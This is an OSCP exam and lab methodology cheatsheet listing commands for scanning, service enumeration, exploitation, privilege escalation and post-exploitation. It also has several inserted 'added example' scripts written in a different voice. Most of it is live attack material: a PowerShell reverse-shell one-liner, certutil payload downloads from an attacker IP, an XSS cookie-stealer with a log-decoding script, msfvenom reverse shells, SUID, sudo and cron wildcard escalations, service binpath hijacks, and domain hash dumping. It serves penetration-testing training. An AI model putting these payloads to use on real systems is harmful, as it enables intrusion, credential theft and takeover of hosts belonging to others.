OSCP Methodology - Dropbox Paper

The document provides an OSCP methodology checklist to assist students with scanning, enumeration, exploitation, privilege escalation, and post-exploitation techniques for labs and exam environments. It includes quick command cheatsheets for tasks like remote desktop connections, transferring files, generating reverse shells, stealing cookies, and scanning networks to identify hosts and services.

Uploaded by Wiraki Ahemad

3/6/2021 OSCP Methodology – Dropbox Paper

OSCP Methodology
Introduction
About 
This checklist aims to give OSCP students a baseline methodology for the lab and exam environments.

Checks
Scanning
Enumeration
Exploitation
Privilege Escalation
Flags
Post Exploitation

Quick Command Cheatsheet

Command / Description

lsof -i :<port>
kill -9 <PID>
    Find and kill a specific service that you do not use anymore.

rdesktop -g <width>x<height> <IP>
    Remote desktop with the screen area set to the given size.

python -m SimpleHTTPServer
certutil.exe -urlcache -split -f http://<attacker IP>/EX.exe
certutil.exe -urlcache -split -f http://<attacker IP>/ipsec.sh accesschk.txt
certutil.exe -urlcache -split -f http://<attacker IP>/icacls.exe icacls.exe
certutil.exe -urlcache -split -f http://<attacker IP>/nc.exe nc.exe
    Transfer files using certutil. This has been my rock during the OSCP challenge. Host a webserver on your box (I've used the python webserver) and pull the files from the Windows target with certutil.
    http://carnal0wnage.attackresearch.com/.../certutil-for-delivery-of-files.html

msfvenom -p windows/shell/reverse_tcp LHOST=<IP> LPORT=<port> -f asp -o wireshell.asp
Within metasploit:
use exploit/multi/handler
set payload windows/shell/reverse_tcp
set lhost <IP>
set lport <port>
    multi/handler example (the handler payload must match the one msfvenom built). Allowed during the exam.

$client = New-Object System.Net.Sockets.TCPClient("<attacker IP>",<port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
    Shell using the PowerShell TCP one-liner.

https://paper.dropbox.com/doc/OSCP-Methodology-EnVX7VSiNGZ2K2QxCZD7Q

Create cookie.js:
var img = document.createElement("img");
img.src = "http://<your IP>/ddos?" + escape(document.cookie);
document.body.appendChild(img);
Copy it to the webserver and inject:
'"><script src="http://<attacker IP>/cookie.js"></script>
    Stealing cookies using XSS. The cookie arrives URL-encoded in the query string of the request your webserver logs.
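The cookie.js entry above only gets the cookie as far as your webserver's access log. The following is an added example, not code from the original page: it reads the lines the python webserver prints for `/ddos?...` hits and URL-decodes the cookie back out. The log format is that of SimpleHTTPServer; the sample lines used to exercise it are constructed, and the `/ddos?` path is the one cookie.js above uses.

```shell
#!/usr/bin/env bash
# Added example, not from the original page: recover the cookies cookie.js
# sends back from the access log of the python webserver that hosts it.
# cookie.js requests /ddos?<escape(document.cookie)>, so each stolen cookie
# lands URL-encoded in the query string of a (404) request line.

# URL-decode escape() output: %XX hex sequences only (escape() does not emit +).
urldecode() {
    printf '%b' "$(printf '%s' "$1" | sed 's/%\([0-9A-Fa-f][0-9A-Fa-f]\)/\\x\1/g')"
}

# Print "<client IP>  <decoded cookie>" for every /ddos? hit read from stdin.
# SimpleHTTPServer line:  10.11.1.5 - - [06/Mar/2021 10:00:01] "GET /ddos?... HTTP/1.1" 404 -
stolen_cookies() {
    local line ip q
    while IFS= read -r line; do
        case "$line" in
            *'"GET /ddos?'*) ;;
            *) continue ;;
        esac
        ip=${line%% *}                     # client address is the first field
        q=${line#*\"GET /ddos\?}           # keep everything after the query mark
        q=${q%% *}                         # drop " HTTP/1.x" and the rest
        printf '%s  %s\n' "$ip" "$(urldecode "$q")"
    done
}

# Usage on the attacking box (SimpleHTTPServer logs to stderr):
#   python -m SimpleHTTPServer 80 2>&1 | tee access.log
#   stolen_cookies < access.log
```

One caveat worth knowing before relying on it: `escape()` leaves `@*_+-./` unencoded and encodes everything else as `%XX` (or `%uXXXX` for non-Latin-1 characters, which this decoder leaves untouched), so the decoded value is exact for the ASCII cookies you will see in the labs.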

Non OSCP machines

Scanning
TCP
UDP
Other

TCP

Command / Description

nmap -Pn -v -sS -A -T<level> <IP>
    Run a standard nmap scan with service detection (-A) and the timing template set.

nmap -Pn -sS --stats-every <n>m --max-retries <n> --max-scan-delay <n> --defeat-rst-ratelimit -T<level> -p- -oA /root/Documents/<target> <IP>
    Run a full nmap scan of all 65535 TCP ports and save the results (-oA) in a folder. Note that this scan is time consuming.

UDP

Command / Description

nmap -sU -sV -p- <IP>
    Run a standard nmap UDP scan with service detection.

nmap -Pn --top-ports <n> -sU --stats-every <n>m --max-retries <n> -T<level> -oA /root/Documents/<target> <IP>
    Run an nmap UDP scan of the top ports and save the results in a folder.

Other

Command / Description

#!/bin/bash
# Reverse-resolve every address in a /24 against the target's DNS server.
i=1
while [ $i -lt 255 ]
do
    nslookup <network prefix>.$i <DNS server IP> | grep -v "NXDOMAIN" | grep name | awk '{ print $NF }'
    i=$((i + 1))
done
    Enumerate all hostnames within a domain using DNS. Helpful to identify each PC name and its IP address within a network.
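The TCP workflow above is three separate commands whose output has to be carried across by hand. The following is an added example, not code from the original page: it wraps the quick and full scans and parses nmap's grepable output (the `.gnmap` file `-oA` writes) so the open ports found by the full scan feed straight into a `-sV -sC` service scan. The output folder under `/root/Documents`, the `-T4` timing and `--max-retries 1` are this example's choices, not values from the page, and the gnmap line used to exercise the parser is constructed.

```shell
#!/usr/bin/env bash
# Added example, not from the original page: chain the quick scan, the full
# TCP port scan and service enumeration, parsing the gnmap output in between.
# Folder and timing values below are this example's assumptions.

# Print the open TCP ports found in an nmap .gnmap file, one per line, sorted.
# A gnmap port entry looks like:  22/open/tcp//ssh//OpenSSH 7.2p2/
open_ports_from_gnmap() {
    grep -E '^Host:.*Ports:' "$1" \
    | sed -e 's/^.*Ports: //' -e 's/[[:space:]]*Ignored State.*$//' \
    | tr ',' '\n' \
    | awk -F/ '{ sub(/^ +/, "", $1) } $2 == "open" && $3 == "tcp" { print $1 }' \
    | sort -n -u
}

# Turn the port list on stdin into the comma-separated form nmap -p expects.
ports_csv() {
    paste -sd, -
}

# Quick scan, then every TCP port, then -sV -sC only against what is open.
scan_host() {
    local ip="$1" out="${2:-/root/Documents/$1}" ports
    mkdir -p "$out"
    nmap -Pn -v -sS -T4 -oA "$out/quick" "$ip"
    nmap -Pn -sS -p- --max-retries 1 --defeat-rst-ratelimit -T4 -oA "$out/full" "$ip"
    ports=$(open_ports_from_gnmap "$out/full.gnmap" | ports_csv)
    if [ -n "$ports" ]; then
        nmap -Pn -sV -sC -p "$ports" -oA "$out/services" "$ip"
    fi
}

# Usage: ./scan.sh scan <IP> [output dir]   (-sS needs root)
if [ "${1:-}" = "scan" ]; then
    scan_host "$2" "${3:-}"
fi
```

Running `-sV -sC` only on the ports the full scan reported keeps the service scan short and means nothing the `-p-` sweep found is forgotten; `--max-retries 1` speeds up the full scan but can miss ports on a lossy link, so re-run without it if the quick scan showed something the full scan did not.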

Enumeration

21 - FTP
80/8080 - HTTP/S
22 - SSH
445/139/135 - SMB
161 - SNMP
3306 - MySQL
1521/1560 - ORACLE
111/139/334 - RPC
Hausec checklist

21 - FTP

Command / Description

nmap --script ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 <IP>
    Enumerate FTP using nmap.

FileZilla or telnet
    Browse and try to connect using anonymous login, e.g. User: anonymous Pass: ano@

80/8080 - HTTP/S

22 - SSH

Command / Description

nc <IP> 22
telnet <IP> 22
    Use nc and telnet to connect and grab the banner.

hydra -V -t <tasks> -C /usr/share/SecLists-<commit>/Passwords/Default-Credentials/ssh-betterdefaultpasslist.txt -s 22 <IP> ssh
    Brute force common username and password pairs (-C takes a user:pass combo list).

nmap -sV -sC <IP>
    Check the SSH version to see if it is vulnerable to any exploits.

nmap -p <port> --script http-shellshock --script-args uri=/cgi-bin/admin.cgi <IP>
curl -H 'User-Agent: () { :; }; echo "CVE-2014-6271 vulnerable"' http://<IP>/cgi-bin/admin.cgi
    Shellshock? Attack vectors: HTTP CGI pages, SSH (requires auth), DHCP server.
    Pivoting or port forwarding: https://github.com/itsKindred/PortPush

445/139/135 - SMB

Command / Description

perl '/root/smbenum/trans2root.pl' -t linx86 -H <IP> -h <IP>
    Old Samba? Use the open source trans2root.pl exploit: https://www.exploit-db.com/exploits/<id>/

nmap -p 445 --script smb-protocols <IP>
nmap -p 445 --script smb-vuln-ms17-010 <IP>
    EternalBlue vulnerability? Check the SMB version (SMBv1 must be enabled) and check if the MS17-010 patch is missing.

python <exploit>.py <IP>
    Exploit using https://github.com/worawit/MS17-010

nmap <IP> -sV -Pn -vv -p 139,445 --script 'smb-vuln*' --script-args unsafe=1
    Nmap SMB scripts: get as much info from these as you can.

nmblookup -A <IP>
enum4linux -a <IP>
rpcclient -U "" <IP>
    srvinfo
    enumdomusers
    getdompwinfo
    querydominfo
    netshareenum
    netshareenumall
smbclient -L <IP>
smbclient //<IP>/tmp
smbclient \\\\<IP>\\ipc$ -U john
smbclient //<IP>/ipc$ -U john
smbclient //<IP>/admin$ -U john
    Connect and enumerate shares; get as much info from these as you can. Look specifically for access to home folders with .ssh credentials. Look for access to upload reverse shells.

Log in with a shell:
winexe -U <username> //<IP> "cmd.exe" --system

smbclient '\\<IP>\share'
put nc.exe
python eternalromance.py <IP> "" "" "c:\\share\\nc -nv <my IP> <port> -e cmd.exe"
    Windows vulnerable to the EternalRomance exploit?

nmap <IP> --script msrpc-enum
    Vulnerable to exploit/windows/dcerpc/ms<xx>_<xxx>_dcom?

161 - SNMP

Command / Description

snmpwalk -c public -v1 <IP>
snmp-check <IP>
snmpcheck -t <IP> -c public
perl snmpenum.pl <IP> public windows.txt
    SNMP enumeration. I've mostly used snmp-check.
    Common community strings: public, private, community

nmap -vv -sV -sU -Pn -p 161 --script snmp-netstat,snmp-processes <IP>
    Nmap SNMP checks.

nmap -sU -p 161 --script /usr/share/nmap/scripts/snmp-win32-users.nse <IP>
    Enumerate Windows users via SNMP.

3306 - MySQL

Command / Description

nmap -sV -Pn -vv <IP> -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122
    Nmap enumeration for MySQL.

https://infamoussyn.wordpress.com/.../gaining-a-root-shell-using-mysql-user-defined-functions-and-setuid-binaries/
    Brilliant guide is here. Too long to post.

1521/1560 - ORACLE

Command / Description

tnscmd10g version -h <IP>
    Enumerate the Oracle TNS listener.

nmap --script oracle-sid-brute <IP>
    Brute force SIDs (oracle-brute below needs a valid SID).

nmap --script oracle-brute <IP>
    Check for default credentials.
    https://github.com/fuzzdb-project/fuzzdb/tree/master/wordlists-user-passwd/oracle

111/139/334 - RPC

Command / Description

rpcinfo -p <IP>
    Output RPC information.
    http://www.tutorialspoint.com/unix_commands/rpcinfo.htm

enum4linux -a <IP>
    Alternative to enum.exe. Brilliant tool. Look for open ports you can't see with nmap. Look for specific vulnerable services or default users.

Hausec checklist

Command / Description

https://hausec.com/pentesting-cheatsheet/#_Toc
    Follow the checklist for enumeration if the above fails.

Exploitation
If you have performed proper enumeration you should be able to find exploits using searchsploit and exploit-db.

If you have modified an exploit, you should include:

The modified exploit code
The URL to the original exploit code
The command used to generate any shellcode (if applicable)
Highlighted changes you have made
An explanation of why those changes were made

I have provided a template I use for exploits during the exam and labs.

Command / Description

https://superuser-ltd.github.io/.../msfvenom-payloads/
    A list of msfvenom one-liners is provided here.

msfvenom -p cmd/unix/reverse_bash LHOST=<IP> LPORT=<port> -f raw
    Compile shell.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<your IP> LPORT=<your port> -f asp -o shell.asp
    Compile shell.

msfvenom -p php/reverse_php LHOST=<IP> LPORT=<port> -f raw -o shell.php
    Compile shell.

msfvenom -p cmd/unix/reverse_netcat LHOST=<IP> LPORT=<port> -f raw
    Compile shell.

msfvenom -p windows/shell_reverse_tcp -a x86 -f python --platform windows LHOST=<IP> LPORT=<port> -b "\x00" EXITFUNC=thread --smallest -e x86/fnstenv_mov
    Compile shell (python-formatted shellcode with the null byte excluded, for use inside a buffer overflow exploit).

gcc -m32 -Wl,--hash-style=both <exploit>.c -o <exploit>
    Compile an exploit for an older (32-bit) target.

https://www.packtpub.com/.../using-autorunscript-in-metasploit
    If the shell does not stay up long enough, use AutoRunScript to migrate to another process first. The default exit options of scripts are also important.

https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/
    Good outline on upgrading your shell to a fully interactive TTY.

https://pen-testing.sans.org/blog/.../escaping-restricted-linux-shells
    Escaping restricted Linux shells.

Exploit Template

Exploit used  

Source  

Modifications required  

Steps to obtain low level shell  

Privilege Escalation
The guides below will assist you in performing privilege escalation. Note that you must follow the exploit template whenever you use an exploit. Train yourself in the habit of documenting your steps.

Linux

Command / Description

find . -name "config.php"
mysql -u root -p<password> offsec
use mysql;
select sys_exec('whoami');
select sys_eval('whoami');
    PHP and MySQL: get the credentials from config.php, then get command execution through a MySQL UDF (sys_exec/sys_eval only exist if the UDF library is loaded).
    http://bernardodamele.blogspot.com/.../command-execution-with-mysql-udf.html

uname -a
linux-exploit-suggester-2.pl -k <KERNEL_VERSION>
gcc <exploit>.c -o exploit -Wl,--hash-style=both
gcc -m32 -Wl,--hash-style=both <exploit>.c -o exploit
    Kernel vulnerability. You don't have to use the exploit suggester; exploit-db works just as well. This was rare in most instances, but in the lab you do get some hosts with vulnerable kernels. The secret is to compile them correctly, as shown with the gcc commands.

find / ! -path "*/proc/*" -perm -o+w -type f -print 2>/dev/null
    World writable files.

find / -perm -u=s -type f 2>/dev/null
find / -perm -4000 -type f 2>/dev/null
    SUID misconfiguration. Example programs: nmap, vim, nano. A binary with the SUID bit can be run by anyone, but it runs with the privileges of its owner, so a root-owned one runs as root.

Nmap example (only old nmap releases still have --interactive):
nmap --interactive
nmap> !sh
https://www.pentestpartners.com/security-blog/exploiting-suid-executables/

cat ~/.bash_history
cd ~
grep -Eir "password|secret|sudo|<username>" * | less
cd /etc
grep -Eir "password|secret|sudo|<username>" * | less
cd /home
grep -Eir "password|secret|sudo|<username>" * | less
cd /var/www
grep -Eir "password|secret|sudo|<username>" * | less
find . -type f | xargs grep <SEARCHTERM>
    Search and grep for keywords in all files.
sudo -l
sudo find /bin -name nano -exec /bin/sh \;
sudo awk 'BEGIN {system("/bin/sh")}'
echo "os.execute('/bin/sh')" > shell.nse && sudo nmap --script shell.nse
sudo vim -c '!sh'
    Sudo shell escapes. Note the list of programs that can run via sudo and look for any of these: find, awk, nmap, vim. If you have any of those, proceed to exploit.
cat /etc/exports
    Exploit misconfigured NFS. If the "no_root_squash" option is defined for the "/tmp" export (or another export), use this method: files you create on the mount as root keep root ownership, so a SUID binary written from the attacking box runs as root on the target.
    http://www.hackingarticles.in/linux-privilege-escalation-using-misconfigured-nfs/

Exploitation
Kali VM:
    showmount -e <Linux VM IP>
    mkdir /tmp/<mountpoint>
    mount -o rw,vers=<version> <Linux VM IP>:/tmp /tmp/<mountpoint>
    echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/<mountpoint>/x.c
    gcc /tmp/<mountpoint>/x.c -o /tmp/<mountpoint>/x
    chmod +s /tmp/<mountpoint>/x
    (compile for the target's architecture, e.g. gcc -m32 for a 32-bit target)
Linux VM:
    /tmp/x
    id
ls -aRl /etc/cron* | awk '$1 ~ /w.$/' 2>/dev/null
cron.d
cron.daily
cron.deny
cron.hourly
cron.monthly
cron.weekly
crontab
    Cron path. Use this if /etc/crontab has a PATH entry you can write to and a job that calls its script by bare name.

Linux VM:
    cat /etc/crontab
    From the output, note the value of the "PATH" variable.
Exploitation (Linux VM):
    echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/overwrite.sh
    chmod +x /home/user/overwrite.sh
    Wait 1 minute for the bash script to execute.
    /tmp/bash -p
    id

Cron tar wildcard
    Use this if /etc/crontab has a tar command or other command that has a wildcard.
Linux VM:
    cat /etc/crontab
    From the output, note the script "/usr/local/bin/compress.sh".
    cat /usr/local/bin/compress.sh
    From the output, note the wildcard (*) used by tar.
    Add checkpoint files that tar will parse as options when the wildcard expands:
    echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/runme.sh
    touch /home/user/--checkpoint=1
    touch /home/user/--checkpoint-action=exec=sh\ runme.sh
    Wait for the script to execute.
    /tmp/bash -p
    id

Cron file overwrite
    Use this if /etc/crontab runs a file that you have write permission to.
    echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' >> /usr/local/bin/overwrite.sh
    Wait for the script to execute.
    /tmp/bash -p
    id
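The tar wildcard steps above only prove themselves once the cron job fires. The following is an added example, not code from the original page: it reproduces the same chain in a scratch directory, without root or a real cron job, and shows the one-line fix for the job. The `vulnerable_backup` function stands in for an assumed root cron entry of the form `cd /home/user && tar cf /tmp/backup.tar *` (not a job from the page), and the payload writes a marker file instead of planting a SUID bash so it is safe to run as any user.

```shell
#!/usr/bin/env bash
# Added example, not from the original page: the cron tar wildcard injection
# reproduced locally. The "backup job" and its path are assumptions.

# The vulnerable job: tar called on an unquoted wildcard inside a directory
# the low-privileged user can write to. GNU tar accepts options anywhere on
# the command line, so expanded filenames beginning with "--" become options.
vulnerable_backup() {
    ( cd "$1" && tar cf "$2" * ) || true
}

# Plant the payload: a script plus two filenames that * will expand into
# --checkpoint=1 and --checkpoint-action=exec=sh runme.sh.
plant_payload() {
    local dir="$1"
    printf '#!/bin/sh\necho "pwned-as-$(id -un)" > "%s/marker"\n' "$dir" > "$dir/runme.sh"
    chmod +x "$dir/runme.sh"
    touch "$dir/--checkpoint=1"
    touch "$dir/--checkpoint-action=exec=sh runme.sh"
}

# Run the chain and return the marker content; empty means the payload did
# not execute (for instance with a non-GNU tar that rejects --checkpoint).
demo_tar_wildcard() {
    local dir
    dir=$(mktemp -d)
    echo "some data" > "$dir/notes.txt"
    plant_payload "$dir"
    vulnerable_backup "$dir" "$dir.tar" >/dev/null 2>&1
    [ -f "$dir/marker" ] && cat "$dir/marker"
    rm -rf "$dir" "$dir.tar"
}

# The fix for the cron job: end option parsing with "--" and anchor the glob
# with "./" so no expanded name can start with a dash.
safe_backup() {
    ( cd "$1" && tar cf "$2" -- ./* ) || true
}

# Same payload against the fixed job: returns empty, the names stay filenames.
demo_safe_backup() {
    local dir
    dir=$(mktemp -d)
    echo "some data" > "$dir/notes.txt"
    plant_payload "$dir"
    safe_backup "$dir" "$dir.tar" >/dev/null 2>&1
    [ -f "$dir/marker" ] && cat "$dir/marker"
    rm -rf "$dir" "$dir.tar"
}
```

In the real scenario the marker line in `runme.sh` is replaced by the `cp /bin/bash /tmp/bash; chmod +s /tmp/bash` payload from the steps above, and the job runs as root, so the marker would read `pwned-as-root`. Note that the filename must contain the whole `--checkpoint-action=exec=sh runme.sh` string including the space, which is why the original step escapes it with a backslash.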
dpkg -l | grep -i exim
    Vulnerable exim if the version is below the affected release.
    https://github.com/HackerFantastic/Public/blob/master/exploits/cve-<id>.sh

exim -bV -v | grep -i perl
    Is exim compiled with perl support? Does exim.conf contain the "perl_startup" option? If so, use cve-<id>.sh.

uname -a
env
id
cat /proc/version
cat /etc/issue
cat /etc/passwd
cat /etc/group
cat /etc/shadow
cat /etc/hosts
grep -vE "nologin" /etc/passwd
    Some manual enumeration within files.

# Debian
dpkg -l
# CentOS, openSUSE, Fedora, RHEL
rpm -qa
# OpenBSD, FreeBSD
pkg_info
    Check for vulnerable software. Use searchsploit or exploit-db. Sometimes GitHub has an exploit as well.

http://www.dankalia.com/tutor/.../.htm
    Is there a '.' in the PATH?

ls -la ~/.ssh/
find / -name "id_dsa*" -o -name "id_rsa*" -o -name "known_hosts" -o -name "authorized_hosts" -o -name "authorized_keys" 2>/dev/null | xargs -r ls -la
    Check all home directories' .ssh folders. Check for root SSH keys.

ps aux | grep root
ps aux | awk '{ print $11 }' | xargs -r ls -la 2>/dev/null | awk '!x[$0]++'
    View privileged services, e.g. running as root, that you might be able to exploit.

https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_-_linux.html
https://blog.g0tmi1k.com/.../basic-linux-privilege-escalation/
    I followed these guides when the above failed.

Windows

Command / Description

https://github.com/LennonCMJ/pentest_script/blob/master/WindowsPE.md
    Run the famous JollyKatz enumeration script. Work through the results. I prefer this as it's not as much of an information overload as the other enumeration scripts.

http://rynudus.blogspot.com/.../sql-ninja.html
    Does it run SQL?

tasklist /fi "USERNAME ne NT AUTHORITY\SYSTEM" /fi "STATUS eq running"
    Which running processes are not SYSTEM? The filter excludes NT AUTHORITY\SYSTEM, so what remains runs under other accounts; drop the USERNAME filter to see the SYSTEM ones.

$username = 'user'
$password = 'password'
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword
Start-Process <your evil bizz here> -Credential $credential
    PowerShell script to run-as another user.

\\REMOTE_HOST\SYSVOL\REMOTE_HOST\Policies\{POLICY_ID}\Machine\Preferences\
    If Windows, check the Group Policy Preferences. The following configuration files may be present:
    Services\Services.xml
    ScheduledTasks\ScheduledTasks.xml
    Printers\Printers.xml
    Drives\Drives.xml
    DataSources\DataSources.xml
    https://memorycorruption.org/windows/.../Notes-On-Windows-Privilege-Escalation.html

Potato.exe -ip <IP> -cmd "net user tater <password> /add && net localgroup administrators tater /add" -disable_exhaust true
    Check if the Hot Potato exploit can be used.
    https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-075
    https://github.com/breenmachine/RottenPotatoNG

wmic service get name,displayname,pathname,startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
wmic service get name,displayname,startmode,pathname | findstr /i /v "C:\Windows\\" | findstr /i /v """
icacls "C:\Program Files (x86)\Privacyware"
    Check to exploit trusted (unquoted) service paths.
    1. List all unquoted service paths.
    2. Check folder permissions on the results with icacls. Look for (M) modify or (W) write for the current user.
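The `wmic ... | findstr` chain above lists candidates, but deciding which of them are actually exploitable (a space inside the executable path, and which intermediate `.exe` names Windows will try) is still manual. The following is an added example, not code from the original page: it runs that check offline on the attack box against a dump taken with `wmic service get name,pathname,startmode /format:csv > services.csv` (the CSV format is this example's choice, since the column-aligned default is awkward to parse) and lists the planting locations to test with icacls. The service entries fed to it in the test are constructed and refer to no real host.

```shell
#!/usr/bin/env bash
# Added example, not from the original page: unquoted service path triage on a
# CSV dump of "wmic service get name,pathname,startmode /format:csv".

# Print "<service> | <path>" for every Auto-start service whose binary path is
# unquoted, contains a space before the .exe, and lives outside C:\Windows.
unquoted_service_paths() {
    tr -d '\r' | awk '
    NR == 1 || $0 == "" { next }                  # header / blank lines
    {
        n = split($0, f, ",")                     # Node,Name,PathName,StartMode
        name = f[2]; mode = f[n]; path = f[3]
        for (i = 4; i < n; i++) path = path "," f[i]   # commas inside the path
        if (mode != "Auto") next
        if (substr(path, 1, 1) == "\"") next      # already quoted
        lp = tolower(path)
        if (index(lp, "c:\\windows\\") == 1) next # system binaries, skip
        p = index(lp, ".exe")
        exe = (p > 0) ? substr(path, 1, p + 3) : path   # drop arguments
        if (index(exe, " ") > 0) print name " | " path
    }'
}

# For one unquoted path, print the locations Windows tries before the real
# binary: the prefix in front of each space, with .exe appended. Check the
# parent directory of each with icacls for (M) or (W) on the current user.
planting_candidates() {
    printf '%s\n' "$1" | awk '{
        lp = tolower($0); p = index(lp, ".exe")
        exe = (p > 0) ? substr($0, 1, p + 3) : $0
        n = split(exe, w, " ")
        acc = w[1]
        for (i = 2; i <= n; i++) { print acc ".exe"; acc = acc " " w[i] }
    }'
}

# Usage: unquoted_service_paths < services.csv
#        planting_candidates 'C:\Program Files\Some Vendor\svc.exe'
```

Only Auto-start services are reported because, without the ability to restart the service, a planted binary in a Manual service's path never runs; if you do hold SERVICE_START on a Manual service, run the check again without the `mode != "Auto"` line.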


accesschk.exe -uwcqv "Authenticated Users" c:\* /accepteula
accesschk.exe -qwsu "Authenticated Users" c:\*
sc qc <SERVICE_NAME>
Exploit:
sc config upnphost binpath= "net localgroup Administrators backdoora /add" depend= ""
sc config upnphost obj= ".\LocalSystem" password= ""
    Check to exploit vulnerable services. accesschk will determine which service binary paths can be modified. Then use sc qc to determine the properties; you want to look for the following:
    SERVICE_CHANGE_CONFIG
    SERVICE_ALL_ACCESS
    GENERIC_WRITE
    GENERIC_ALL
    WRITE_DAC
    WRITE_OWNER
    https://www.gracefulsecurity.com/privesc-insecure-service-permissions/
    https://labs.mwrinfosecurity.com/assets/BlogFiles/mwri-windows-services-all-roads-lead-to-system-whitepaper.pdf

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
msfvenom -p windows/adduser USER=rottenadmin PASS=<password> -f msi -o rotten.msi
msiexec /quiet /qn /i C:\Users\Steve.INFERNO\Downloads\rotten.msi
    Is AlwaysInstallElevated enabled on the server? We can exploit that. First check the registry: both values must be set to 1. Then use msfvenom to create the msi.

for %a in ("%path:;=";"%") do accesschk.exe /accepteula -dqv "%~a"
    PATH exploit: check every directory in PATH for write access.

// What system are we connected to?
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
// Get the hostname and username if available
hostname
echo %username%
// Get users
net users
net user <username>
// Networking stuff
ipconfig /all
// Printer?
route print
// ARP-arific
arp -A
// Active network connections
netstat -ano
// Firewall fun (Win XP SP2 and above)
netsh firewall show state
netsh firewall show config
// Scheduled tasks
schtasks /query /fo LIST /v
// Running processes to started services
tasklist /SVC
net start
// Driver madness
DRIVERQUERY
// WMIC fun (Win 7/8 -- XP requires admin)
wmic /?
# Use wmic_info script!
// WMIC: check patch level
wmic qfe get Caption,Description,HotFixID,InstalledOn
// Search patches for a given KB
wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB.." /C:"KB.."
// AlwaysInstallElevated fun
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
// Other commands to run to hopefully get what we need
dir /s *pass* == *cred* == *vnc* == *.config*
findstr /si password *.xml *.ini *.txt
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
// Service permissions
sc query
sc qc <service_name>
// Accesschk stuff
accesschk.exe /accepteula (always do this first!)
accesschk.exe -ucqv <service_name> (requires Sysinternals accesschk!)
accesschk.exe -uwcqv "Authenticated Users" * (won't yield anything on Win 8)
accesschk.exe -ucqv <service_name>
// Find all weak folder permissions per drive.
accesschk.exe -uwdqs Users c:\
accesschk.exe -uwdqs "Authenticated Users" c:\
// Find all weak file permissions per drive.
accesschk.exe -uwqs Users c:\*.*
accesschk.exe -uwqs "Authenticated Users" c:\*.*
// Find services with unquoted service paths:
wmic service get name,displayname,pathname,startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
// Binary planting
sc config <service_name> binpath= "C:\nc.exe -nv <RHOST> <RPORT> -e C:\WINDOWS\System32\cmd.exe"
sc config <service_name> obj= ".\LocalSystem" password= ""
sc qc <service_name> (to verify!)
net start <service_name>
    Some manual enumeration.

http://www.bhafsec.com/wiki/index.php/Windows_Privilege_Escalation
https://github.com/AusJock/Privilege-Escalation/tree/master/Windows
https://github.com/abatchy17/WindowsExploits
    Pre-compiled Windows exploits.

https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html
http://hackingandsecurity.blogspot.com/.../oscp-windows-priviledge-escalation.html
https://www.sploitspren.com/.../Windows-Privilege-Escalation-Guide/
    Some brilliant resources if the above fails.

Dump

Local
Document the steps used to escalate to local access. In most instances you will be escalating to root/Admin and not to another local user.

Root/Admin
Document the steps used to escalate to root access. For exploits, make use of the exploit template.

Flags
Proof.txt
ifconfig/ipconfig
whoami/id

The commands below list all .txt files to identify the flags. Used in several CTFs and useful for the OSCP challenge.

Windows:
for /R ".\" %A in (*.txt) do echo %~fA %~zA | findstr /v "echo"
Linux:
find . -type f -name "*.txt"

Each local.txt and proof.txt found must be shown in a screenshot that includes the contents of the file, as well as the IP address of the target by using ipconfig or ifconfig. An example of this is shown below:

Proof
Paste your proof here.

Post Exploitation
Use this for the labs. Note that the machines in the exam are not connected to each other, so I can only advise spending more time on enumeration and exploitation than on post exploitation.

Linux

File / Description

/etc/resolv.conf
    Contains the current name servers (DNS) for the system. This is a globally readable file that is less likely to trigger IDS alerts than /etc/passwd.

/etc/motd
    Message of the Day.

/etc/issue
    Debian: current version of the distro.

/etc/passwd
    List of local users.

/etc/shadow
    List of users' password hashes (requires root).

~/.bash_history
    Will give you some directory context.

~/.mysql_history
    MySQL database history; could have passwords.

Windows

Command / Description

net user <username> <password> /ADD
net localgroup Administrators <username> /ADD
    Add yourself as administrator.

impacket-secretsdump -system '/root/Documents/OSCP/<IP>/system.save' -ntds '/root/Documents/OSCP/<IP>/ntds.dit' LOCAL
    Dump the Active Directory hashes offline from a copied ntds.dit and SYSTEM hive.

netsh firewall add portopening TCP <port> "Service Firewall" ENABLE ALL
    Enable specific firewall ports.

arp -a
netstat -abno
ipconfig /all
route print
schtasks /query /fo LIST /v
netsh firewall show config
    Look for any connections to other hosts in the lab. Here you have a pivoting opportunity.

for /R ".\" %A in (*.txt) do echo %~fA %~zA | findstr /v "echo"
    Look at text files.

net share
    Look at file shares.

